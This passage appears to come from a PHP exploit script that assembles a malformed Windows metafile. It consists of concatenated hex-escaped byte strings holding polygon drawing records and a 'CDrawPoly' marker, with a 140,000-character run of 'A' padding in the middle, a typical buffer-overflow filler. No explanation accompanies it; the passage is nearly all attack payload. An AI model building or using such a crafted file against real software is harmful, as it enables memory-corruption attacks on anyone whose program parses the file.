"\x82\xfe\xbc\x00\x89\xfe\xb0\x00\x93\xfe\xa4\x00\x9c\xfe\x97\x00".
"\xaa\xfe\x87\x00\xb7\xfe\x7a\x00\xc8\xfe\x6f\x00\xcb\xfe\x6e\x00".
"\xd3\xfe\x6d\x00\xe2\xfe\x6b\x00\xec\xfe\x6b\x00\xef\xfe\x6b\x00".
"\xf2\xfe\x6c\x00\x03\xff\x6f\x00\x13\xff\x77\x00\x23\xff\x7f\x00".
"\x38\xff\x88\x00\x48\xff\x90\x00\x59\xff\x9b\x00\x65\xff\xa6\x00".
"\x72\xff\xaf\x00\x85\xff\xc2\x00\x99\xff\xda\x00\xb1\xff\xf3\x00".
"\xd0\xff\x0c\x01\xe2\xff\x20\x01\xf9\xff\x2f\x01\xfc\xff\x33\x01".
"\x02\x00\x3f\x01\x04\x00\x41\x01\x05\x00\x44\x01\x06\x00\x45\x01".
"\x06\x00\x46\x01\x06\x00\x48\x01\x06\x00\x49\x01\x06\x00\x4a\x01".
"\x06\x00\x4b\x01\x06\x00\x4d\x01\x05\x00\x4f\x01\x05\x00\x50\x01".
"\x05\x00\x52\x01\x04\x00\x53\x01\x03\x00\x54\x01\x02\x00\x56\x01".
"\x02\x00\x57\x01\xfe\xff\x59\x01\xfc\xff\x5b\x01\xf9\xff\x5e\x01".
"\xea\xff\x65\x01\xdb\xff\x6b\x01\xb1\xff\x78\x01\x9f\xff\x7b\x01".
"\x8e\xff\x7b\x01\x7c\xff\x7b\x01\x60\xff\x7b\x01\x49\xff\x7b\x01".
"\x30\xff\x75\x01\x17\xff\x6f\x01\xfd\xfe\x65\x01\xe2\xfe\x5b\x01".
"\xcd\xfe\x53\x01\xbf\xfe\x4d\x01\xb0\xfe\x48\x01\xad\xfe\x48\x01".
"\xab\xfe\x46\x01\xa8\xfe\x45\x01\xa5\xfe\x44\x01\xa2\xfe\x43\x01".
"\xa1\xfe\x42\x01\x9d\xfe\x3f\x01\x9c\xfe\x3d\x01\x99\xfe\x3b\x01".
"\x97\xfe\x3a\x01\x93\xfe\x33\x01\x92\xfe\x31\x01\x8f\xfe\x2e\x01".
"\x8f\xfe\x2c\x01\x8e\xfe\x2a\x01\x8e\xfe\x29\x01\x8e\xfe\x27\x01".
"\x8e\xfe\x25\x01\x8e\xfe\x24\x01\x8e\xfe\x22\x01\x8e\xfe\x20\x01".
"\x8f\xfe\x20\x01\x8f\xfe\x1e\x01\x90\xfe\x1e\x01\x91\xfe\x1e\x01".
"\x93\xfe\x1e\x01\x94\xfe\x1e\x01\x96\xfe\x1e\x01\x98\xfe\x1e\x01".
"\x99\xfe\x1e\x01\x9a\xfe\x20\x01\xa9\xfe\x27\x01\xb7\xfe\x2c\x01".
"\xc7\xfe\x39\x01\xff\xfe\x68\x01\x2c\xff\x95\x01\x2f\xff\x98\x01".
"\x3c\xff\x9f\x01\x47\xff\xa4\x01\x53\xff\xa8\x01\x61\xff\xad\x01".
"\x6f\xff\xaf\x01\x7f\xff\xaf\x01\x96\xff\xaf\x01\xad\xff\xaf\x01".
"\xcc\xff\xa5\x01\xec\xff\x9a\x01\x11\x00\x90\x01\x30\x00\x86\x01".
"\x4b\x00\x78\x01\x87\x00\x5c\x01\x9d\x00\x53\x01\xb2\x00\x49\x01".
"\xc2\x00\x3e\x01\xd1\x00\x3a\x01\xd5\x00\x35\x01\xe0\x00\x2e\x01".
"\xe5\x00\x2b\x01\xe7\x00\x28\x01\xe9\x00\x26\x01\xeb\x00\x23\x01".
"\xec\x00\x21\x01\xec\x00\x1d\x01\xec\x00\x1a\x01\xec\x00\x0e\x01".
"\xe9\x00\x02\x01\xe1\x00\xf4\x00\xdd\x00\xe8\x00\xd8\x00\xdd\x00".
"\xd6\x00\xd9\x00\xd2\x00\xd3\x00\xd0\x00\xd0\x00\xcf\x00\xce\x00".
"\xcd\x00\xcd\x00\xcb\x00\xca\x00\xc8\x00\xc9\x00\xc5\x00\xc7\x00".
"\xb4\x00\xc7\x00\xa6\x00\xca\x00\x98\x00\xce\x00\x82\x00\xdb\x00".
"\x72\x00\xe3\x00\x5f\x00\xf3\x00\x47\x00\x07\x01\x26\x00\x1d\x01".
"\x09\x00\x33\x01\xed\xff\x48\x01\xd0\xff\x5e\x01\xb2\xff\x74\x01".
"\x74\xff\xa0\x01\x48\xff\xb8\x01\x1b\xff\xd1\x01\xfb\xfe\xde\x01".
"\xe5\xfe\xeb\x01\xda\xfe\xf0\x01\xd3\xfe\xf2\x01\xd2\xfe\xf2\x01".
"\xd1\xfe\xf2\x01\xd0\xfe\xf2\x01\xce\xfe\xf1\x01\xcd\xfe\xf0\x01".
"\xcb\xfe\xef\x01\xc8\xfe\xed\x01\xc6\xfe\xea\x01\xc3\xfe\xe8\x01".
"\xc1\xfe\xe3\x01\xbf\xfe\xe1\x01\xbd\xfe\xdc\x01\xbb\xfe\xda\x01".
"\xbb\xfe\xd7\x01\xbb\xfe\xd5\x01\xbb\xfe\xd2\x01\xbb\xfe\xd0\x01".
"\xbb\xfe\xcd\x01\xbb\xfe\xcb\x01\xbd\xfe\xc9\x01\xbd\xfe\xc7\x01".
"\xbe\xfe\xc5\x01\xbf\xfe\xc3\x01\xbf\xfe\xc2\x01\xc0\xfe\xc0\x01".
"\xc1\xfe\xbe\x01\xc2\xfe\xbb\x01\xc4\xfe\xb8\x01\xc8\xfe\xac\x01".
"\xdc\xfe\x94\x01\xde\xfe\x92\x01\xdf\xfe\x93\x01\xe9\xfe\x97\x01".
"\xf9\xfe\x9f\x01\x0e\xff\xa8\x01\x19\xff\xaf\x01\x28\xff\xb3\x01".
"\x33\xff\xb9\x01\x3f\xff\xbd\x01\x4d\xff\xc2\x01\x62\xff\xca\x01".
"\x71\xff\xd0\x01\x8b\xff\xd9\x01\xaa\xff\xe0\x01\xc2\xff\xe3\x01".
"\xda\xff\xe6\x01\xf2\xff\xea\x01\x25\x00\xea\x01\x3c\x00\xea\x01".
"\x53\x00\xea\x01\x66\x00\xe8\x01\x8c\x00\xdf\x01\x9b\x00\xdc\x01".
"\x9e\x00\xdb\x01\xa1\x00\xd9\x01\xac\x00\xd5\x01\xae\x00\xd2\x01".
"\xb1\x00\xd1\x01\xb3\x00\xcf\x01\xb6\x00\xcc\x01\xb8\x00\xc9\x01".
"\xbb\x00\xc5\x01\xc4\x00\xba\x01\xd1\x00\xaf\x01\xda\x00\xa3\x01".
"\xdd\x00\xa0\x01\xe7\x00\x92\x01\xe9\x00\x8e\x01\xed\x00\x82\x01".
"\xef\x00\x7f\x01\xf1\x00\x74\x01\xf3\x00\x68\x01\xf3\x00\x5e\x01".
"\xf5\x00\x4f\x01\xf5\x00\x45\x01\xf2\x00\x3b\x01\xf1\x00\x36\x01".
"\xe7\x00\x27\x01\xd6\x00\x10\x01\xb9\x00\xf6\x00\x74\x00\xc5\x00".
"\x4b\x00\xa5\x00\x24\x00\x88\x00\xf7\xff\x6c\x00\xc0\xff\x4e\x00".
"\x9e\xff\x38\x00\x81\xff\x27\x00\x71\xff\x1b\x00\x62\xff\x16\x00".
"\x45\xff\x11\x00\x37\xff\x0f\x00\x27\xff\x0f\x00\x13\xff\x15\x00".
"\xf3\xfe\x23\x00\xd8\xfe\x2d\x00\x91\xfe\x52\x00\x70\xfe\x61\x00".
"\x50\xfe\x6b\x00\x30\xfe\x7a\x00\x1f\xfe\x85\x00\x1b\xfe\x88\x00".
"\x18\xfe\x8c\x00\x16\xfe\x90\x00\x15\xfe\x93\x00\x13\xfe\xa0\x00".
"\x13\xfe\xac\x00\x15\xfe\xb9\x00\x19\xfe\xc8\x00\x20\xfe\xd3\x00".
"\x25\xfe\xe2\x00\x28\xfe\xf5\x00\x2b\xfe\x08\x01\x2b\xfe\x18\x01".
"\x2b\xfe\x26\x01\x2b\xfe\x34\x01\x2b\xfe\x3f\x01\x2b\xfe\x42\x01".
"\x2b\xfe\x4c\x01\x2b\xfe\x65\x01\x2b\xfe\x70\x01\x2b\xfe\x72\x01".
"\x2b\xfe\x75\x01\x2b\xfe\x78\x01\x2b\xfe\x79\x01\x2b\xfe\x7a\x01".
"\x2b\xfe\x7b\x01\x2b\xfe\x7d\x01\x2b\xfe\x7f\x01\x2b\xfe\x80\x01".
"\x2b\xfe\x84\x01\x2b\xfe\x86\x01\x2b\xfe\x87\x01\x2c\xfe\x87\x01".
"\x2c\xfe\x88\x01\x2c\xfe\x89\x01\x2d\xfe\x8a\x01\x2f\xfe\x8a\x01".
"\x31\xfe\x8b\x01\x34\xfe\x8c\x01\x42\xfe\x8c\x01\x52\xfe\x8c\x01".
"\x6f\xfe\x8c\x01\x98\xfe\x85\x01\xc2\xfe\x7d\x01\xe6\xfe\x76\x01".
"\x2d\xff\x6c\x01\x4a\xff\x68\x01\x61\xff\x68\x01\x78\xff\x68\x01".
"\x89\xff\x68\x01\x9a\xff\x68\x01\xab\xff\x68\x01\xbd\xff\x68\x01".
"\xe0\xff\x66\x01\xf3\xff\x63\x01\x0b\x00\x60\x01\xe9\xff\x2e\x01".
"\xec\xff\x2c\x01\xfd\xff\x2a\x01\x0b\x00\x28\x01\x24\x00\x25\x01".
"\x2f\x00\x25\x01\x3a\x00\x25\x01\x3d\x00\x25\x01\x40\x00\x25\x01".
"\x46\x00\x25\x01\x49\x00\x25\x01\x4b\x00\x26\x01\x4e\x00\x26\x01".
"\x52\x00\x29\x01\x54\x00\x29\x01\x55\x00\x2b\x01\x56\x00\x2c\x01".
"\x58\x00\x2d\x01\x59\x00\x2e\x01\x5b\x00\x2f\x01\x5d\x00\x31\x01".
"\x5e\x00\x32\x01\x60\x00\x34\x01\x61\x00\x36\x01\x64\x00\x3a\x01".
"\x68\x00\x3e\x01\x6a\x00\x41\x01\x6c\x00\x43\x01\x70\x00\x45\x01".
"\x72\x00\x47\x01\x75\x00\x49\x01\x78\x00\x4c\x01\x7b\x00\x4c\x01".
"\x8a\x00\x50\x01\x99\x00\x56\x01\xa6\x00\x56\x01\xb4\x00\x59\x01".
"\xc2\x00\x5b\x01\xdd\x00\x5b\x01\xee\x00\x5b\x01\x02\x01\x56\x01".
"\x15\x01\x53\x01\x27\x01\x50\x01\x36\x01\x4e\x01\x41\x01\x4c\x01".
"\x5a\x01\x47\x01\x69\x01\x42\x01\x6c\x01\x41\x01\x6d\x01\x3f\x01".
"\x6f\x01\x3f\x01\x70\x01\x3f\x01\x70\x01\x3e\x01\x71\x01\x3e\x01".
"\x71\x01\x3d\x01\x72\x01\x3b\x01\x73\x01\x3a\x01\x74\x01\x37\x01".
"\x76\x01\x34\x01\x7a\x01\x31\x01\x80\x01\x2a\x01\x82\x01\x27\x01".
"\x84\x01\x23\x01\x87\x01\x1e\x01\x89\x01\x1c\x01\x8b\x01\x1b\x01".
"\x8c\x01\x1a\x01\x8e\x01\x19\x01\x8f\x01\x16\x01\x90\x01\x15\x01".
"\x90\x01\x14\x01\x92\x01\x13\x01\x93\x01\x11\x01\x93\x01\x10\x01".
"\x93\x01\x0b\x01\x93\x01\x08\x01\x8e\x01\xfd\x00\x8b\x01\xf0\x00".
"\x89\x01\xe4\x00\x84\x01\xd1\x00\x71\x01\xa3\x00\x66\x01\x91\x00".
"\x62\x01\x85\x00\x60\x01\x82\x00\x5e\x01\x81\x00\x5d\x01\x81\x00".
"\x5d\x01\x80\x00\x5c\x01\x80\x00\x5a\x01\x7f\x00\x58\x01\x7f\x00".
"\x56\x01\x7e\x00\x54\x01\x7e\x00\x4a\x01\x7d\x00\x47\x01\x7d\x00".
"\x32\x01\x7d\x00\x26\x01\x7d\x00\x23\x01\x7e\x00\x21\x01\x7e\x00".
"\x1f\x01\x7e\x00\x1d\x01\x7e\x00\x1c\x01\x7e\x00\x1b\x01\x7e\x00".
"\x1a\x01\x7e\x00\x1a\x01\x7f\x00\x19\x01\x80\x00\x18\x01\x81\x00".
"\x18\x01\x83\x00\x16\x01\x86\x00\x13\x01\x8b\x00\x0f\x01\x96\x00".
"\x0d\x01\x99\x00\x0c\x01\x9c\x00\x07\x01\xa8\x00\x03\x01\xc4\x00".
"\x00\x01\xcf\x00\x00\x01\xd2\x00\x00\x01\xd5\x00\x00\x01\xd9\x00".
"\x00\x01\xda\x00\x00\x01\xdb\x00\x01\x01\xdd\x00\x02\x01\xde\x00".
"\x05\x01\xe1\x00\x08\x01\xe2\x00\x1a\x01\xe9\x00\x25\x01\xec\x00".
"\x28\x01\xee\x00\x34\x01\xf3\x00\x3f\x01\xf3\x00\x41\x01\xf3\x00".
"\x43\x01\xf3\x00\x45\x01\xf3\x00\x49\x01\xf3\x00\x4b\x01\xf3\x00".
"\x4d\x01\xf2\x00\x4f\x01\xf1\x00\x51\x01\xf0\x00\x53\x01\xee\x00".
"\x55\x01\xec\x00\x57\x01\xea\x00\x59\x01\xe9\x00\x5a\x01\xe8\x00".
"\x5e\x01\xe6\x00\x5e\x01\xe5\x00\x60\x01\xe5\x00\x61\x01\xe5\x00".
"\x62\x01\xe5\x00\x63\x01\xe6\x00\x64\x01\xe7\x00\x65\x01\xe8\x00".
"\x65\x01\xe9\x00\x67\x01\xee\x00\x67\x01\xf0\x00\x67\x01\xf3\x00".
"\x67\x01\xfc\x00\x67\x01\xff\x00\x67\x01\x0a\x01\x67\x01\x0d\x01".
"\x67\x01\x0f\x01\x65\x01\x13\x01\x65\x01\x15\x01\x64\x01\x16\x01".
"\x63\x01\x18\x01\x63\x01\x19\x01\x61\x01\x1b\x01\x5e\x01\x1d\x01".
"\x5d\x01\x1e\x01\x5c\x01\x20\x01\x5b\x01\x22\x01\x58\x01\x24\x01".
"\x57\x01\x25\x01\x56\x01\x25\x01\x56\x01\x26\x01\x37\x00\x71\x01".
"\x6e\xff\xad\x00\x3c\xff\xdd\x00\x25\x00\x00\x00\x0c\x00\x00\x00".
"\x00\x00\x00\x80\x25\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x00\x80".
"\x28\x00\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x0e\x00\x00\x00".
"\x14\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00".
"\x64\x00\x01\x00\x01\x00\x41\x41\x41\x41\x01\x00\xff\xff\x00\x00".
"\x09\x00\x43\x44\x72\x61\x77\x50\x6f\x6c\x79\x13\xfe\xff\xff\x0f".
"\x00\x00\x00\x16\x02\x00\x00\xb3\x02\x00\x00\x01\x00\x06\x00\x00".
"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x01\x00\x00\x00\x8f".

str_repeat("A",140000).

"\x05\x96\x05\xe8\xfe\xff\xff\xc5\x01\x00\x00\xe9\xfe\xff\xff\xc5".
"\x01\x00\x00\xe8\xfe\xff\xff\xc5\x01\x00\x00\xe8\xfe\xff\xff\xc4".
"\x01\x00\x00\xe8\xfe\xff\xff\xc3\x01\x00\x00\xe9\xfe\xff\xff\xc2".
"\x01\x00\x00\xeb\xfe\xff\xff\xc0\x01\x00\x00\xec\xfe\xff\xff\xbd".
"\x01\x00\x00\xf0\xfe\xff\xff\xbb\x01\x00\x00\xf0\xfe\xff\xff\xb9".
"\x01\x00\x00\xf3\xfe\xff\xff\xb6\x01\x00\x00\xf5\xfe\xff\xff\xb1".
"\x01\x00\x00\xf9\xfe\xff\xff\xae\x01\x00\x00\x00\xff\xff\xff\xa3".
"\x01\x00\x00\x06\xff\xff\xff\x97\x01\x00\x00\x11\xff\xff\xff\x8c".
"\x01\x00\x00\x24\xff\xff\xff\x78\x01\x00\x00\x3b\xff\xff\xff\x68".
"\x01\x00\x00\x4c\xff\xff\xff\x59\x01\x00\x00\x5f\xff\xff\xff\x46".
"\x01\x00\x00\x76\xff\xff\xff\x35\x01\x00\x00\x8d\xff\xff\xff\x26".
"\x01\x00\x00\x9f\xff\xff\xff\x1a\x01\x00\x00\xab\xff\xff\xff\x10".
"\x01\x00\x00\xbb\xff\xff\xff\x09\x01\x00\x00\xbe\xff\xff\xff\x05".
"\x01\x00\x00\xc9\xff\xff\xff\x00\x01\x00\x00\xcd\xff\xff\xff\xff".
"\x00\x00\x00\xd9\xff\xff\xff\xfa\x00\x00\x00\xdb\xff\xff\xff\xfa".
"\x00\x00\x00\xdd\xff\xff\xff\xf9\x00\x00\x00\xdf\xff\xff\xff\xf7".
"\x00\x00\x00\xe1\xff\xff\xff\xf7\x00\x00\x00\xe2\xff\xff\xff\xf7".
"\x00\x00\x00\x19\x01\x00\x00\xba\x01\x00\x00\xd5\xff\xff\xff\x7f".
"\x01\x00\x00\xd6\xff\xff\xff\x7f\x01\x00\x00\xd4\xff\xff\xff\x7e".
"\x01\x00\x00\xd2\xff\xff\xff\x7d\x01\x00\x00\xce\xff\xff\xff\x7d".
"\x01\x00\x00\xcc\xff\xff\xff\x7c\x01\x00\x00\xca\xff\xff\xff\x7a".
"\x01\x00\x00\xc8\xff\xff\xff\x78\x01\x00\x00\xc6\xff\xff\xff\x77".
"\x01\x00\x00\xc2\xff\xff\xff\x74\x01\x00\x00\xc0\xff\xff\xff\x72".
"\x01\x00\x00\xbd\xff\xff\xff\x70\x01\x00\x00\xba\xff\xff\xff\x6e".
"\x01\x00\x00\xae\xff\xff\xff\x66\x01\x00\x00\xab\xff\xff\xff\x64".
"\x01\x00\x00\xa7\xff\xff\xff\x60\x01\x00\x00\xa4\xff\xff\xff\x5d".
"\x01\x00\x00\xa0\xff\xff\xff\x5a\x01\x00\x00\x9b\xff\xff\xff\x56".
"\x01\x00\x00\x92\xff\xff\xff\x4a\x01\x00\x00\x8b\xff\xff\xff\x3e".
"\x01\x00\x00\x89\xff\xff\xff\x3b\x01\x00\x00\x86\xff\xff\xff\x36".
"\x01\x00\x00\x83\xff\xff\xff\x33\x01\x00\x00\x80\xff\xff\xff\x28".
"\x01\x00\x00\x7c\xff\xff\xff\x1c\x01\x00\x00\x75\xff\xff\xff\x11".
"\x01\x00\x00\x75\xff\xff\xff\x05\x01\x00\x00\x74\xff\xff\xff\x02".
"\x01\x00\x00\x74\xff\xff\xff\xf8\x00\x00\x00\x71\xff\xff\xff\xec".
"\x00\x00\x00\x71\xff\xff\xff\xe9\x00\x00\x00\x71\xff\xff\xff\xe7".
"\x00\x00\x00\x74\xff\xff\xff\xe4\x00\x00\x00\x75\xff\xff\xff\xe1".
"\x00\x00\x00\x77\xff\xff\xff\xe0\x00\x00\x00\x7a\xff\xff\xff\xdf".
"\x00\x00\x00\x7c\xff\xff\xff\xdd\x00\x00\x00\x7e\xff\xff\xff\xdd".
"\x00\x00\x00\x80\xff\xff\xff\xdc\x00\x00\x00\x82\xff\xff\xff\xdb".
"\x00\x00\x00\x85\xff\xff\xff\xdb\x00\x00\x00\x87\xff\xff\xff\xdb".
"\x00\x00\x00\x88\xff\xff\xff\xdb\x00\x00\x00\x8a\xff\xff\xff\xdb".
"\x00\x00\x00\x8c\xff\xff\xff\xdb\x00\x00\x00\x8e\xff\xff\xff\xdb".
"\x00\x00\x00\x90\xff\xff\xff\xdc\x00\x00\x00\x93\xff\xff\xff\xdd".
"\x00\x00\x00\x96\xff\xff\xff\xdf\x00\x00\x00\xa3\xff\xff\xff\xe5".
"\x00\x00\x00\xb5\xff\xff\xff\xf1\x00\x00\x00\xd2\xff\xff\xff\x02".
"\x01\x00\x00\xef\xff\xff\xff\x1c\x01\x00\x00\x09\x00\x00\x00\x3a".
"\x01\x00\x00\x19\x00\x00\x00\x50\x01\x00\x00\x20\x00\x00\x00\x69".
"\x01\x00\x00\x23\x00\x00\x00\x7c\x01\x00\x00\x23\x00\x00\x00\x8e".
"\x01\x00\x00\x1e\x00\x00\x00\x9d\x01\x00\x00\x18\x00\x00\x00\xab".
"\x01\x00\x00\x11\x00\x00\x00\xb7\x01\x00\x00\x0f\x00\x00\x00\xb9".
"\x01\x00\x00\x0d\x00\x00\x00\xbc\x01\x00\x00\x0c\x00\x00\x00\xbd".
"\x01\x00\x00\x0b\x00\x00\x00\xbe\x01\x00\x00\x0a\x00\x00\x00\xbe".
"\x01\x00\x00\x0a\x00\x00\x00\xbf\x01\x00\x00\x09\x00\x00\x00\xbf".
"\x01\x00\x00\x08\x00\x00\x00\xbf\x01\x00\x00\x07\x00\x00\x00\xbf".
"\x01\x00\x00\x05\x00\x00\x00\xbf\x01\x00\x00\x03\x00\x00\x00\xbf".
"\x01\x00\x00\xff\xff\xff\xff\xbf\x01\x00\x00\xfd\xff\xff\xff\xbf".
"\x01\x00\x00\xfb\xff\xff\xff\xbe\x01\x00\x00\xf8\xff\xff\xff\xbc".
"\x01\x00\x00\xf5\xff\xff\xff\xbb\x01\x00\x00\xf3\xff\xff\xff\xb9".
"\x01\x00\x00\xf1\xff\xff\xff\xb7\x01\x00\x00\xef\xff\xff\xff\xb6".
"\x01\x00\x00\xed\xff\xff\xff\xb3\x01\x00\x00\xec\xff\xff\xff\xb2".
"\x01\x00\x00\xea\xff\xff\xff\xb0\x01\x00\x00\xea\xff\xff\xff\xaf".
"\x01\x00\x00\xe9\xff\xff\xff\xae\x01\x00\x00\xe7\xff\xff\xff\xac".
"\x01\x00\x00\xe6\xff\xff\xff\xab\x01\x00\x00\xe4\xff\xff\xff\xa9".
"\x01\x00\x00\xe3\xff\xff\xff\xa7\x01\x00\x00\xe1\xff\xff\xff\xa5".
"\x01\x00\x00\xdf\xff\xff\xff\xa3\x01\x00\x00\xde\xff\xff\xff\x9f".
"\x01\x00\x00\xdc\xff\xff\xff\x9e\x01\x00\x00\xdb\xff\xff\xff\x9d".
"\x01\x00\x00\xd9\xff\xff\xff\x99\x01\x00\x00\xd9\xff\xff\xff\x98".
"\x01\x00\x00\xd7\xff\xff\xff\x96\x01\x00\x00\xd6\xff\xff\xff\x94".
"\x01\x00\x00\xd4\xff\xff\xff\x93\x01\x00\x00\xd3\xff\xff\xff\x91".
"\x01\x00\x00\xd0\xff\xff\xff\x8e\x01\x00\x00\xce\xff\xff\xff\x8c".
"\x01\x00\x00\xcc\xff\xff\xff\x8a\x01\x00\x00\xc9\xff\xff\xff\x88".
"\x01\x00\x00\xc7\xff\xff\xff\x86\x01\x00\x00\xc5\xff\xff\xff\x84".
"\x01\x00\x00\xc3\xff\xff\xff\x81\x01\x00\x00\xc2\xff\xff\xff\x80".
"\x01\x00\x00\xc0\xff\xff\xff\x7e\x01\x00\x00\xbe\xff\xff\xff\x7e".
"\x01\x00\x00\xbd\xff\xff\xff\x7c\x01\x00\x00\xbc\xff\xff\xff\x7c".
"\x01\x00\x00\xba\xff\xff\xff\x7a\x01\x00\x00\xb9\xff\xff\xff\x78".
"\x01\x00\x00\xb9\xff\xff\xff\x77\x01\x00\x00\xb8\xff\xff\xff\x75".
"\x01\x00\x00\xb8\xff\xff\xff\x74\x01\x00\x00\xb8\xff\xff\xff\x71".
"\x01\x00\x00\xb8\xff\xff\xff\x6f\x01\x00\x00\xb8\xff\xff\xff\x6d".
"\x01\x00\x00\xba\xff\xff\xff\x6b\x01\x00\x00\xbc\xff\xff\xff\x67".
"\x01\x00\x00\xbf\xff\xff\xff\x64\x01\x00\x00\xc2\xff\xff\xff\x62".
"\x01\x00\x00\xc5\xff\xff\xff\x60\x01\x00\x00\xd1\xff\xff\xff\x5e".
"\x01\x00\x00\xd4\xff\xff\xff\x5c\x01\x00\x00\xdf\xff\xff\xff\x5a".
"\x01\x00\x00\xeb\xff\xff\xff\x58\x01\x00\x00\xf6\xff\xff\xff\x58".
"\x01\x00\x00\x04\x00\x00\x00\x58\x01\x00\x00\x11\x00\x00\x00\x58".
"\x01\x00\x00\x20\x00\x00\x00\x5d\x01\x00\x00\x2b\x00\x00\x00\x62".
"\x01\x00\x00\x37\x00\x00\x00\x66\x01\x00\x00\x42\x00\x00\x00\x6b".
"\x01\x00\x00\x4e\x00\x00\x00\x70\x01\x00\x00\x52\x00\x00\x00\x72".
"\x01\x00\x00\x55\x00\x00\x00\x74\x01\x00\x00\x57\x00\x00\x00\x76".
"\x01\x00\x00\x5a\x00\x00\x00\x79\x01\x00\x00\x5a\x00\x00\x00\x7a".
"\x01\x00\x00\x5a\x00\x00\x00\x7c\x01\x00\x00\x5a\x00\x00\x00\x7d".
"\x01\x00\x00\x5a\x00\x00\x00\x7f\x01\x00\x00\x58\x00\x00\x00\x80".
"\x01\x00\x00\x57\x00\x00\x00\x82\x01\x00\x00\x53\x00\x00\x00\x86".
"\x01\x00\x00\x51\x00\x00\x00\x87\x01\x00\x00\x46\x00\x00\x00\x8b".
"\x01\x00\x00\x35\x00\x00\x00\x8e\x01\x00\x00\x1f\x00\x00\x00\x8e".
"\x01\x00\x00\x02\x00\x00\x00\x8e\x01\x00\x00\xe4\xff\xff\xff\x8b".
"\x01\x00\x00\xc6\xff\xff\xff\x85\x01\x00\x00\xab\xff\xff\xff\x77".
"\x01\x00\x00\x8a\xff\xff\xff\x68\x01\x00\x00\x73\xff\xff\xff\x54".
"\x01\x00\x00\x56\xff\xff\xff\x3f\x01\x00\x00\x3a\xff\xff\xff\x2d".
"\x01\x00\x00\x2b\xff\xff\xff\x1b\x01\x00\x00\x26\xff\xff\xff\x0f".
"\x01\x00\x00\x24\xff\xff\xff\x04\x01\x00\x00\x23\xff\xff\xff\x01".
"\x01\x00\x00\x23\xff\xff\xff\xfd\x00\x00\x00\x28\xff\xff\xff\xf2".
"\x00\x00\x00\x2b\xff\xff\xff\xef\x00\x00\x00\x32\xff\xff\xff\xe3".
"\x00\x00\x00\x3c\xff\xff\xff\xd7\x00\x00\x00\x48\xff\xff\xff\xcd".
"\x00\x00\x00\x4c\xff\xff\xff\xc9\x00\x00\x00\x58\xff\xff\xff\xc2".
"\x00\x00\x00\x66\xff\xff\xff\xbe\x00\x00\x00\x7e\xff\xff\xff\xba".
"\x00\x00\x00\x8c\xff\xff\xff\xb8\x00\x00\x00\x9c\xff\xff\xff\xb8".
"\x00\x00\x00\xb4\xff\xff\xff\xbc\x00\x00\x00\xce\xff\xff\xff\xc2".
"\x00\x00\x00\xe3\xff\xff\xff\xcb\x00\x00\x00\xfe\xff\xff\xff\xd9".
"\x00\x00\x00\x15\x00\x00\x00\xe9\x00\x00\x00\x28\x00\x00\x00\xfc".
"\x00\x00\x00\x34\x00\x00\x00\x0d\x01\x00\x00\x3f\x00\x00\x00\x1e".
"\x01\x00\x00\x4f\x00\x00\x00\x30\x01\x00\x00\x61\x00\x00\x00\x43".
"\x01\x00\x00\x74\x00\x00\x00\x57\x01\x00\x00\x83\x00\x00\x00\x68".
"\x01\x00\x00\x8b\x00\x00\x00\x78\x01\x00\x00\x8e\x00\x00\x00\x7c".
"\x01\x00\x00\x8e\x00\x00\x00\x7f\x01\x00\x00\x8e\x00\x00\x00\x81".
"\x01\x00\x00\x8e\x00\x00\x00\x84\x01\x00\x00\x8b\x00\x00\x00\x87".
"\x01\x00\x00\x89\x00\x00\x00\x8a\x01\x00\x00\x79\x00\x00\x00\x91".
"\x01\x00\x00\x5e\x00\x00\x00\x9f\x01\x00\x00\x3b\x00\x00\x00\xa6".
"\x01\x00\x00\x12\x00\x00\x00\xa9\x01\x00\x00\xe3\xff\xff\xff\xad".
"\x01\x00\x00\xb7\xff\xff\xff\xad\x01\x00\x00\x89\xff\xff\xff\xaa".
"\x01\x00\x00\x5e\xff\xff\xff\x9f\x01\x00\x00\x38\xff\xff\xff\x8f".
"\x01\x00\x00\x18\xff\xff\xff\x80\x01\x00\x00\x03\xff\xff\xff\x78".
"\x01\x00\x00\xff\xfe\xff\xff\x74\x01\x00\x00\xfd\xfe\xff\xff\x71".
"\x01\x00\x00\xfc\xfe\xff\xff\x6f\x01\x00\x00\xfc\xfe\xff\xff\x6d".
"\x01\x00\x00\xfc\xfe\xff\xff\x6c\x01\x00\x00\xfe\xfe\xff\xff\x69".
"\x01\x00\x00\x00\xff\xff\xff\x67\x01\x00\x00\x03\xff\xff\xff\x66".
"\x01\x00\x00\x08\xff\xff\xff\x63\x01\x00\x00\x13\xff\xff\xff\x5c".
"\x01\x00\x00\x25\xff\xff\xff\x57\x01\x00\x00\x35\xff\xff\xff\x4f".
"\x01\x00\x00\x4f\xff\xff\xff\x45\x01\x00\x00\x69\xff\xff\xff\x3c".
"\x01\x00\x00\x89\xff\xff\xff\x34\x01\x00\x00\xa6\xff\xff\xff\x31".
"\x01\x00\x00\xbe\xff\xff\xff\x2e\x01\x00\x00\xd0\xff\xff\xff\x2e".
"\x01\x00\x00\xda\xff\xff\xff\x2e\x01\x00\x00\xe5\xff\xff\xff\x33".
"\x01\x00\x00\xe7\xff\xff\xff\x34\x01\x00\x00\xe9\xff\xff\xff\x36".
"\x01\x00\x00\xea\xff\xff\xff\x36\x01\x00\x00\xeb\xff\xff\xff\x37".
"\x01\x00\x00\xeb\xff\xff\xff\x39\x01\x00\x00\xeb\xff\xff\xff\x3a".
"\x01\x00\x00\xeb\xff\xff\xff\x3b\x01\x00\x00\xeb\xff\xff\xff\x3c".
"\x01\x00\x00\xeb\xff\xff\xff\x3d\x01\x00\x00\xea\xff\xff\xff\x3e".
"\x01\x00\x00\xe7\xff\xff\xff\x3f\x01\x00\x00\xdd\xff\xff\xff\x41".
"\x01\x00\x00\xc8\xff\xff\xff\x41\x01\x00\x00\xa6\xff\xff\xff\x41".
"\x01\x00\x00\x8a\xff\xff\xff\x41\x01\x00\x00\x6e\xff\xff\xff\x41".
"\x01\x00\x00\x5c\xff\xff\xff\x41\x01\x00\x00\x51\xff\xff\xff\x41".
"\x01\x00\x00\x4f\xff\xff\xff\x41\x01\x00\x00\x4f\xff\xff\xff\x40".
"\x01\x00\x00\x4e\xff\xff\xff\x3f\x01\x00\x00\x4e\xff\xff\xff\x3e".
